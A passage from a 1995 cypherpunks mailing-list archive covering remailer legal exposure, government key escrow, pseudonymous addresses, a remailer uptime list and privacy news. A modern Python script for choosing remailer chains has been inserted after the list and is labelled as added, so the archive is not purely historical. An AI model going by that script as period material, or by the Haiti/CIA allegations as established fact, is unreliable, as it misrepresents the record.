Westlaw shows some 860-odd screen pages worth of annotations for 28 USC 1651
and, frankly, I'm not up to reading them, at least not on a whim.

According to _In re Application of United States_, supra, and _In re
Application of United States_ 616 F2d 1122 (9th Cir., 1980), the telephone
company (and likely a remailer) is entitled to an in camera hearing prior
to the law enforcement use of facilities/personnel to determine if it is
unduly burdensome and/or how much compensation should be paid.

The opinions also don't go anywhere near the question of whether or not the
phone company had the choice to simply go out of business entirely; I think
that option would be more easily available to a remailer. If my remailer
were served with an order to begin logging, I think I might prefer to move
all of the RAM in that box over to my Windows box, say, so that I could get 
Terminal Velocity to run with SVGA resolution, or whatever. I do think
there's a meaningful difference between asking an enormous business to run
their operations a wee bit differently (or ask technicians to work overtime,
where the court pays the overtime) and forcing a single individual to
reorganize their life around a criminal investigation. (see the discussion
of over-burdensomeness)

Then again, it doesn't seem so hard for the cops to just seize the box(es)
which run the remailers, set them up down at the station, and start watching
traffic. This seems to be a factor in favor of running remailers on big
systems which would be politically more difficult to seize, e.g., Portal's
or Caltech's or some other big multiuser box owned by someone who's already
got an attorney on retainer.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMLf/X3YhjZY3fMNAQErsAQAqnZMR1JcO0TiAwIf1O6QG5Xf4UIStL/F
H7+4FHG7LREM0puuKHo1ObcSoqiOXNidz08ZTWk8AYyQdOdHlppnzSjXlnv0srZn
FkfQXiIJIIBz0MvH4cAGnBHVnQzPKK47LhaUheo4zxV9/8urwjTPeCKeWG/wR538
IEZuefyxxwE=
=IK82
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Mon, 4 Dec 95 04:43:33 PST
To: cypherpunks@toad.com
Subject: GAK the Spooks not the Civilians
Message-ID: <v03003e00ace84506f548@[129.46.82.85]>
MIME-Version: 1.0
Content-Type: text/pgp


-----BEGIN PGP SIGNED MESSAGE-----

Message-Id:<v03003e00ace84506f548@[129.46.82.85]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Sender: Level Seven Design
X-PGP-KeyID-Fprnt: 4AAF00E5 - 30D81F3484E6A83F  6EC8D7F0CAB3D265
X-PGP: http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=lsd
X-Floppyright: (f)1995 LSD.com _ Unlicensed retransmission prohibited.
Date: Mon, 4 Dec 1995 04:40:07 -0800
To:  cypherpunks@toad.com
From:  Dave Del Torto <ddt@lsd.com>
Subject:  GAK the Spooks not the Civilians
Cc:  hungary-online@hungary.yak.net, zamir-chat-l@igc.apc.org

#define GAK Government Access to Keys, aka "key escrow": a copy of the
secret half of your secret/public cryptographic key-pair, normally known
only to you, is held in a "vault" somewhere by your government in case they
decide they need to read your encrypted private email with/without your
knowledge.

Here's an argument in favor of a _limited_ GAK* system, and a timely
example of why I think it's necessary. As I see it, there are two main
varieties of GAK-mail:

  #1: GAK for Citizens' keys
  #2: GAK for Government employees' keys

I'm disregarding #1 right off as being totally unacceptable, but I favor a
form of #2 "...of, by and for the People" directed at the government itself
and monitored by the elected representatives of the Executive and
Legislative branches as perhaps being essential to Democracy's survival.
Where official business is concerned, some form of GAK could go a long way
toward preventing the majority of everyday abuses by subrosa forces in a
government. It might be useless to aim it at teflon-coated, black-budgeted
outfits like the CIA or NSA, but it could keep a lot of other officials
honest as they go about doing the everyday business of running OUR
government for us through email.

One of the main reasons that the TLAs are pushing so hard for GAK is the
Culture of Distrust they stew in. They choose it: they breed and feed upon
and among the very sorts of minds who become involved in covert activities:
spooks. A Spook Culture begets a Spook Attitude towards other spheres of
social interaction -- like secure email between PGP, Eudora and Netscape
users who just desire private communications. I think this Spook psychology
is unavoidable, but if they'd just stick to loosing their creations on
*themselves*, then fine.

I just learned from CBS's "60 Minutes" program, along with millions of
other Americans, about a disturbing event involving the Clinton
administration, the State Dept and the CIA. I say "allegedly" to be fair
(after all, no indictments have been handed down...yet) but it looks
reasonably clear to me: the interview was with the main individual involved
and he was quite clear about what had happened. Even if it's untrue, it's a
roadmap for what could easily happen if back-channel operators are allowed
to run the government during those milliseconds when the people we elect to
do it turn their heads.

You may remember the incident not so long ago where a US naval vessel was
set to deploy a peace-keeping force of Marines in the capital city of Haiti
so that President-elect Aristide could later assume office (foreshadowing
IFOR). The USS Harlan County was within a few thousand meters of docking,
when a small riot developed on the quay (in full view of camera crews).
Clinton decided reluctantly to abandon the landing at the last minute.
There were apparently only 40 or so FRAP members involved, but there they
were on the US nightly news that evening (interesting, but another topic).
One "Mr. Toto Constant," a leader of the right-wing Haitian militia group
FRAP and reportedly a longtime CIA contact/operative, claimed in an
interview on the CBS report that he met with the CIA station chief in
Port-au-Prince BEFORE the scheduled landing and assured him that the
planned FRAP "media frenzy" on the docks was going to be peaceful, was to
be performed for the benefit of the cameras only and would be no threat to
US personnel whatsoever. The CIA refused to confirm these allegations, but
according to CBS, Warren Christopher later implied that Constant was
telling the truth about having dealt with the CIA in the past. Hmmm.

The plot thickens: this CIA station chief allegedly then disinformed
President Clinton, the Secretary of State Christopher and the cabinet (and
one assumes the Congressional overseers as well) about Mr. Constant's
assurances that there was no danger to the US Marines. Because he was
unaware of the lack of a real threat and because he was also misinformed by
the CIA that there might in fact be a threat, Clinton's hand was forced by
popular fears and media speculation about another "Somalia" scenario, and
he made the difficult decision not to land the troops. The domestic result
was cries of "cowardice" from conservatives and frustration among US
voters. Does this smack of Watergate-style dirty tricks to anyone besides
me? Rogue elements in the CIA manipulate intelligence information, provide
the President of the US (up for re-election) with faulty information,
advise him to make an embarrassing foreign policy decision in contradiction
to information they possess and then conservatives in the US Congress and
Republican party accuse him of being soft and unable to show leadership.
And people suggest Fred Cohen is overdoing his caffeine intake? Pour me a
cup, Fred. These are the same guys suggesting they'll hang on to a copy of
my secret key. Yeah, sure.

The riots quickly evolved into murder squads consisting of Haitian military
units and former Ton-Ton Macoutes who purged the Aristide supporters among
their fellow Haitians until Clinton sent Jimmy Carter down, followed
closely by the Marines. The resulting genocidal catastrophe was an
atrocity, a blow against Caribbean stability and a major embarrassment to
the Clinton administration. Meanwhile, the CIA (and maybe Army and Navy
Intelligence) quietly raided a Haitian facility and "confiscated" 150,000
items of evidence, which they still refuse to turn over to Aristide, even
though it reportedly contains info on the CIA's contacts within FRAP, the
group still trying to destabilize his government. To add insult to injury,
the US still insists Aristide step down in February 1996, years short of a
full term, if you count the time he spent in forced exile after his
original election while the Haitian elite stripped the paintings off the
walls and headed for Switzerland. It's hard to blame Aristide for being a
bit upset under these circumstances, but he made his bargain with the
You-know-what...

Besides the Haitians who died in the subsequent political violence, and the
blow to the stability of the developing Haitian democracy and US foreign
policy, this incident, even if it only has roots in the truth, is a
troubling indication that "shadow governments" operating inside and behind
the elected US government have a profound effect on our lives. After all,
it's CIA intelligence that supposedly tells us when it's safe to drive the
1st Armoured's A-1's down to Sarajevo, right? It also brings up some other
interesting questions:

+ Did CIA take the same guy they had in Haiti and rotate him to Bosnia to
   lunch with Karadzic?
+ Information is power: do the intelligence services of our government
   wield it _at_ their own Executive branch "handlers?"
+ In this climate, are CIA and related intelligence branches having an
   impact on the specifications (eg. Fortezza) for methods and systems
   that could exert controls over the information we as citizens can
   keep private -- solely for purposes of self-preservation?

If the Executive branch's policy initiatives (whether we like them or not)
are at the mercy of forces WITHIN it, how can they possibly hope to store
our escrowed keys safely, much less guarantee a US democracy? Who is it in
the White House that keeps an eye on the message traffic of this CIA
station chief? Who keeps a copy of HIS secret key escrowed and who vets the
intelligence he generates before it ends up at cabinet-level
decision-making meetings where US troop movements are decided? Just who the
heck is running this country? Sure, Clinton and Gore want a national crypto
policy: given what their own dogs may be doo-ing it's not that hard to
understand, but hey, watch where yer pointin' that GAK there, Bubba.

Granted, the more crypto-savvy ophidians in the intelligence services are
bound to find other methods for passing such conspiratorial information if
they are prone to that, but how many bottom-feeders in our government are
trying little maneuvers of this nature through "normal" channels - and how
much of _that_ type of activity should be actively monitored (and who
polices _those_ police)? Maybe we need to take a closer look as a nation at
implementing a better GAK system for the State Department and the
Intelligence branches.

BTW, the CBS reporters at "60 Minutes" (Ed Bradley, et alia) received a
faxed CIA statement while preparing their report, stating that "...the CIA
collects and analyzes intelligence, it does not formulate policy..." and
that any implication that they manipulated intelligence regarding the
Haitian incident "is false." Excuse me while I clear my throat.

So, make those GAK versions for the feds, Netscape, but be sure you make
the rest of us a vanilla version. I don't need to send my mail from
Netscape: I'll stick with an untampered PGP for now. Clinton should require
GAK for govt employees doing official business only: if they go home, boot
up a non-GAKed system and start sending mail to their spook peers, their
traffic should be monitored and they should be hauled up in front of
Congress. Hey, couldn't be all bad, right? Later, they can write a book
about their experiences, and maybe run for public office like Ollie North.
;)

   dave


____________________________________________________________________________
"I mixed this myself. (holds up glass of water) Two parts "H," one part "O."
 I don't trust _anybody_!"                                  --Steven Wright




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Verbum sapienti satis est.

iQCVAwUBMMLsQKHBOF9KrwDlAQEgYQP+ITWALlvdS68sdkydQwG/DMgJ1CSI01wX
X1U3yWG6txLykUppFPP3hs476KqHLpoeL1tCscj2QRCqYY1sz4NoZ3ZEkJXcMP1Y
6Qt/KpHr/AXTDSDQD7QIFIYzZ4S+69hXiMV7mSK76nRLkbke8REA+k15w03atN+R
2l/vGhu4mzo=
=DeD3
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 4 Dec 95 05:27:04 PST
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED.
Message-ID: <199512041326.FAA19260@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Don M. Kitchen wrote:

> Someone posing as Alice said:

It wasn't anyone "posing" as Alice.  It was the real banana.

> > As I promised, I've now opened a channel so that anyone who wants to
> > can send Alice de 'nonymous email.  I can now be reached via
> > an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
> > address will get to me, and I will do my best to reply to you as well,
> > but I can't guarantee, anything.
> 
> Laszlo Vecsey <master@internexus.net> said:
> 
> > I don't think that was a smart thing to do. Your real email is now 
> > registered in some database in Finland - how difficult would it be to 
> > retrieve it? From what I remember organizations like Scientology had no 

Sorry ... beg to differ ... my real email is not registered in some 
database in Finland.  No offence, but you have no idea what I have 
registered in Finland.  Whatever lies behind the anon address is simply
something which is "reasonably" reliable.  It could be a dummy account, 
or it could even be a chain of remailers and processes.  

Who knows??  Do you?

How difficult would it be to retrieve it from Finland?  I don't really
know.  It really hadn't crossed my mind.  I thought that Julf might run a
good outpost in Finland.  And that he'd take reasonable efforts (i.e. not
go down with the ship) to protect my privacy. 

He strikes me as reasonably reliable that way.  

> Not _nearly_ as hard as breaking/finding an appropriately encrypted key.

Maybe, maybe not.  It depends on a lot of things, now doesn't it?  And
breaking or finding an appropriately encrypted key, doesn't *quite*
address the problem of people sending email to me without any hassle,
does it?? 

I think that the ISP who hosts my remailer has already had to deal with
a slew of mail over the "Alice" antics, and the spoofed posts.  This way, 
if someone wants to take issue with something which they've read, the 
ISP can simply ask them to write the author.

> I for one am not going to even bother with the penet address unless the
> posts come from there. After all, it's a forgery anyway. The real Alice
> already posted a PGP key. I wouldn't be reading this list if I were
> going to fall over for a simple impersonation.

Great that's your choice and your prerogative.  I don't see what on earth
you'd have to say to me in any event.  And before you go patting yourself
on the back about impersonations, have a look at my last post to this list. 
The one under the subject of "Do the Right Thing." 

Right at the bottom of the post is my signature, and ... ta dah ... my
penet address.  What does that *logically* tell you??  

Maybe that the author of that post, the long-winded one that criticizes 
Jim Clark for his stand on GAK and his short-sighted views will accept 
email via penet.fi at an455120@anon.penet.fi?? 
 
> Of course, if our impersonating, trusts-penet-not-PGP-coworkers-think-
> of-everything-but-a-packet-sniffer Alice were to post from penet,
> then everyone (including procmail ;) would have to believe his claims
> of pseudo-identity.

I trust penet to do one thing for me.  I trust penet not to send me email
that is larger than 1 Megabyte.  And the reason I trust penet not to do 
that is that Julf's mailer won't handle it.  His mailer will choke on it.

That's it.

If you think that I'm relying on Julf to protect me, then you are sadly
mistaken.  Many, many people already share in the secret of who Alice is. 
That's a fact.  I'm not looking for anyone to keep my identity a "secret". 
I'm simply looking for some peace so that I can do some reading, some
writing, and some "thinken".  And Julf protects me from huge emails.

That's it.  And now, if anyone wants to establish a dialogue with me, 
they can.  Or if they don't want to (like you) then that's not a 
problem for me either.  

My previous way of getting contacted (via postmaster@att.com or
postmaster@netscape.com) didn't seem to be working well.  The two
companies weren't forwarding email to me.  Never got anything from 
them forwarded.

Now, not only AT&T and Netscape can talk with me, so can anyone else.
And if they want to have some "secure" super-secret dialogue with me, then
we can do that also.  I've posted a partial protocol on how to do that
already.  Not one that's for super-dee-dooper secret stuff, but one that's
Pretty OK.  And it uses PGP for one part.

> I must say, L.D. is really falling all over himself this time. Maybe
> he's just trying to make people *think* he's a cryptobungler, so that he
> can keep his other tentacles with whom he converses out of suspicion.

Good Grief.  Is it something they put in the water down wherever 
you're at??  I am not L.D ... oh, what is the point ...

> Don
> 
> Wishing Emacs had IMAP support cuz here comes mailcrypt

Mailcrypt??  Emacs??  *Shudder* ... is it compatible with PGP 2.3?



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 4 Dec 95 06:50:08 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512041450.GAA06784@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 4 Dec 95 6:47:39 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hroller  hroller@c2.org                   ---########*     7:37  99.98%
hacktic  remailer@utopia.hacktic.nl       * *** ******     7:13  99.59%
rmadillo remailer@armadillo.com             ++++++++++    40:07  99.51%
portal   hfinney@shell.portal.com           *##* #+*##     2:31  99.27%
c2       remail@c2.org                    - +*****++-     48:01  99.14%
extropia remail@extropia.wimsey.com         ----.---.   7:39:43  98.95%
vishnu   mixmaster@vishnu.alias.net         * *** *#**     5:22  98.88%
spook    remailer@valhalla.phoenix.net      **   ..-**  3:29:17  98.79%
flame    remailer@flame.alias.net           ****** ***    17:26  98.78%
amnesia  amnesia@chardos.connix.com          *- --+- +  1:52:55  98.67%
ecafe    cpunk@remail.ecafe.org           # ## ##  ###     7:56  98.58%
wmono    wmono@valhalla.phoenix.net          **   *  *    12:35  98.13%
shinobi  remailer@shinobi.alias.net         +*-  + --+    45:49  97.35%
alumni   hal@alumni.caltech.edu             +*     *#*     3:38  96.35%
bsu-cs   nowhere@bsu-cs.bsu.edu             # ### ## #      :17  95.83%
ideath   remailer@ideath.goldenbear.com     .-. ...- - 17:35:13  95.65%
replay   remailer@replay.com                **   *   *     5:12  95.51%
mix      mixmaster@remail.obscura.com     .--.---.-     9:59:28  94.15%
rahul    homer@rahul.net                    +* **** +*     7:33  99.00%
penet    anon@anon.penet.fi               - -+ -  -    10:45:41  82.20%
gondolin mix@remail.gondolin.org                     -  2:06:09  81.59%
ford     remailer@bi-node.zerberus.de      ++   .---   14:40:50  79.58%
robo     robo@c2.org                      --*####    #    14:09  69.63%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
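
The table and the shared-operator groups above are enough to automate chain selection. The following is an added example, not part of Raph Levien's message or of premail: it parses rows copied from the table and picks a chain that never uses two remailers from the same listed group. Reading the latency column as [h:]m:ss, treating blanks in the history column as "no data", and the greedy highest-uptime policy are assumptions.

```python
import re

# Operator/machine groups exactly as listed in the message above.
SHARED_GROUPS = [
    {"robo", "syrinx", "c2"},
    {"flame", "hacktic", "replay"},
    {"alumni", "portal"},
]

# A subset of rows copied from the 4 Dec 95 table above.
SAMPLE_ROWS = """\
hroller  hroller@c2.org                   ---########*     7:37  99.98%
hacktic  remailer@utopia.hacktic.nl       * *** ******     7:13  99.59%
portal   hfinney@shell.portal.com           *##* #+*##     2:31  99.27%
c2       remail@c2.org                    - +*****++-     48:01  99.14%
extropia remail@extropia.wimsey.com         ----.---.   7:39:43  98.95%
flame    remailer@flame.alias.net           ****** ***    17:26  98.78%
alumni   hal@alumni.caltech.edu             +*     *#*     3:38  96.35%
bsu-cs   nowhere@bsu-cs.bsu.edu             # ### ## #      :17  95.83%
replay   remailer@replay.com                **   *   *     5:12  95.51%
robo     robo@c2.org                      --*####    #    14:09  69.63%
"""

# name, address, free-form history column, latency, uptime percentage
ROW_RE = re.compile(
    r"^(\S+)\s+(\S+@\S+)(.*?)\s+((?:\d+:)?\d*:\d{2})\s+(\d+\.\d+)%\s*$"
)


def latency_seconds(text):
    """Convert '[h:]m:ss' (assumed layout; ':17' means 17 seconds) to seconds."""
    total = 0
    for part in text.split(":"):
        total = total * 60 + int(part or 0)
    return total


def parse_row(line):
    """Parse one table row into a dict; raise ValueError on a malformed row."""
    match = ROW_RE.match(line)
    if match is None:
        raise ValueError("unparseable row: %r" % line)
    name, address, history, latency, uptime = match.groups()
    return {
        "name": name,
        "address": address,
        # Blanks are dropped (assumed to mean no ping result for that slot).
        "history": history.replace(" ", ""),
        "latency": latency_seconds(latency),
        "uptime": float(uptime),
    }


def load(text):
    """Parse every non-blank line of a table body."""
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def fast_fraction(history):
    """Share of recorded pings answered in under an hour ('#' or '*' in the key)."""
    if not history:
        return 0.0
    return sum(history.count(symbol) for symbol in "#*") / len(history)


def group_of(name):
    """Index of the shared-operator group a remailer belongs to, or None."""
    for index, members in enumerate(SHARED_GROUPS):
        if name in members:
            return index
    return None


def pick_chain(remailers, hops, min_uptime):
    """Pick `hops` remailers, highest uptime first, at most one per shared group.

    Two hops run by one operator or on one machine give that party both ends
    of a link, so a second member of an already-used group is skipped.
    Raises ValueError when the constraints cannot be met.
    """
    if hops < 1:
        raise ValueError("hops must be at least 1")
    chain, used_groups = [], set()
    for entry in sorted(remailers, key=lambda r: r["uptime"], reverse=True):
        if entry["uptime"] < min_uptime:
            break
        group = group_of(entry["name"])
        if group is not None and group in used_groups:
            continue
        chain.append(entry["name"])
        if group is not None:
            used_groups.add(group)
        if len(chain) == hops:
            return chain
    raise ValueError("only %d independent remailers meet the uptime floor" % len(chain))


if __name__ == "__main__":
    print(pick_chain(load(SAMPLE_ROWS), 6, 95.0))
```

In real use the order of the selected hops would be shuffled per message; it is left deterministic here so the result can be checked.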




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Dec 95 04:49:47 PST
To: cypherpunks@toad.com
Subject: SEN_sor
Message-ID: <199512041250.HAA03141@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-4-95. NYPeeper:

   "The Rand Corporation salutes E-mail as the new foundation
   of democracy." Denise Caruso's column.

      Are we ready, as a society, for ubiquitous Government-
      mandated electronic communication? Not yet. E-mail today
      does not have the same constitutional free-speech and
      privacy protections already afforded the telephone and
      postal mail. In addition, free speech on the Net is far
      from assured. There are several bills pending in
      Congress right now that would severely restrict what
      people can say in either private or public forums on the
      Internet. Despite Rand's finding that virtual
      communities are powerful tools for democratic discourse,
      it will be difficult for communities to form under
      constant threat of censorship.

   "Java Backers Taking Aim At Microsoft's Dominance."

      A number of Silicon Valley companies plan announcements
      on Monday that together constitute an anti-Microsoft
      campaign. The most noteworthy: A plan by Sun and
      Netscape for a user-friendly version of the Java
      software technology for the Web. The strategies being
      announced this week represent opening skirmishes in what
      may be the next great standards battle in the industry.

   "Nearing the $500 Computer for Internet Use."

      Acorn is about to introduce a stripped-down machine for
      Net surfing that sells for about $900. By stripping it
      of its monitor and hard disk drive, and adding a
      high-speed modem, Acorn executives say they can hit a
      retail price less than $500. They plan to ship the
      Netsurfer by early next year, and are discussing
      licensing with Oracle and a number of American and Asian
      companies.


   SEN_sor  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Mon, 4 Dec 95 09:16:08 PST
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
Message-ID: <m0tMeLx-00091DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 
>> Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules."  They could still cooperate according to the LETTER of the law.
>
>	It's in the phone company's best interest to be cooperative.
>*but* in the case of, say, an internet privacy provider, it is in the
>provider's best interest to be uncooperative.


I would PREFER that I be able to legally obligate my service provider (and phone co) to provide only that level of cooperation which is actually, literally, legally required.  I would like to be able to know that if my service is tapped in some way, I receive a letter de-certifying the previous state of non-tapped-ness that it possessed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Dec 95 06:25:06 PST
To: cypherpunks@toad.com
Subject: GAK_hit
Message-ID: <199512041425.JAA18561@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-4-95. W$Jabber:

   "Microsoft Probe Spurs Subpoenas Tied to Internet.
   Antitrust Effort Appears Focused on Windows 95 Disabled
   Rival Software."

      The subpoenas indicate that Justice Department officials
      are focusing on whether Microsoft's Windows 95 and
      related Internet software improperly disable rival
      programs that let users access the Internet. Industry
      executives said the Justice Department has issued "civil
      investigative demands" to Netscape and CompuServe.

      The subpoena issued to Netscape may be of particular
      significance. In the estimate of Netscape and industry
      observers, roughly 80% of World Wide Web users, a
      population pegged at more than 17 million, use
      Netscape's software. Because of that presence, even if
      Netscape were alone in having its software disabled by
      Microsoft's new products, "I would say Netscape would
      have a cause of action and that the Justice Department
      would have a basis to investigate or bring an action,"
      said Garret Rasmussen, an antitrust lawyer.

   GAK_hit  (5 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 4 Dec 95 01:41:36 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <Pine.3.89.9512040911.A16085-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Timothy C. May wrote:

> "Events planned for this year's conference include:
> 
>     - Federal prosecutors square off against civil-liberties lawyers
>       in a Supreme Court test of the "Cryptography Control Act of
>       1996", which criminalizes non-escrowed encryption."

Shouldn't that be the "Child Protection, Anti-Terrorism and Electronic 
Privacy Act of 1996" ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 4 Dec 95 07:33:14 PST
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: PRIVACY WATCHDOG OUTS BIG B
Message-ID: <n1394049238.55375@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



MEDIA RELEASE

Contact: Simon Davies, Privacy International
Davies@privint.demon.co.uk

PRIVACY WATCHDOG OUTS BIG BROTHER COMPANIES 

New report uncovers a massive international surveillance trade
funded by the arms industry and led by the UK

On Monday 4 December, Privacy International will publish Big
Brother Incorporated, a 150 page report which investigates the
global trade in repressive surveillance technologies. The report, to
be published on several Web sites on the Internet,  shows how
technology companies in Europe and North America provide the
surveillance infrastructure for the secret police and military
authorities in such countries as China, Indonesia, Nigeria, Angola,
Rwanda and Guatemala.

The report's primary concern is the flow of sophisticated
computer-based technology from developed countries to
developing countries  - and particularly to non-democratic regimes.
The report demonstrates how these companies have strengthened
the lethal authority of the world's most dangerous regimes.

The report lists the companies, their directors, products and exports.
In each case, source material is meticulously cited. 
Privacy International is publishing the report in digital form in
several sites on the Internet to ensure its accessibility by interested
parties anywhere in the world.

Surveillance technologies are defined as technologies which can
monitor, track and assess the movements, activities and
communications of individuals.  More than 80 British companies are
involved, making the UK the world leader in this field. Other
countries, in order of significance, are the United States, France,
Israel, the Netherlands and Germany.

_Big Brother Incorporated_ is the first investigation ever conducted
into this trade.  Privacy International intends to update the report
from time to time using trade fair documents and leaked information
from whistleblowers.

The surveillance trade is almost indistinguishable from the arms
trade. More than seventy per cent of companies manufacturing and
exporting surveillance technology also export arms, chemical
weapons, or military hardware.  Surveillance is a crucial element
for the maintenance of any  non-democratic infrastructure, and is an
important activity in the pursuit of intelligence and political control.
Many countries in transition to democracy also rely heavily on
surveillance to satisfy the demands of police and military. The
technology described in the report makes possible mass
surveillance of populations.  In the past, regimes relied on targeted
surveillance.

Much of this technology is used to track the activities of dissidents,
human rights activists, journalists, student leaders, minorities, trade
union leaders, and political opponents. It is also useful for
monitoring larger sectors of the population. With this technology,
the financial transactions, communications activity and geographic
movements of millions of people can be captured, analysed and
transmitted cheaply and efficiently.

Western surveillance technology is providing invaluable support to
military and totalitarian authorities throughout the world.  One
British computer firm provided the technological infrastructure to
establish the South African automated Passbook system, upon
which much of the functioning of the Apartheid regime  British
surveillance cameras were used in Tiananmen Square against the
pro-democracy demonstrators.  In the 1980s,  an Israeli company
developed and exported the technology for the computerised death
list used by the Guatemalan police. Two British companies
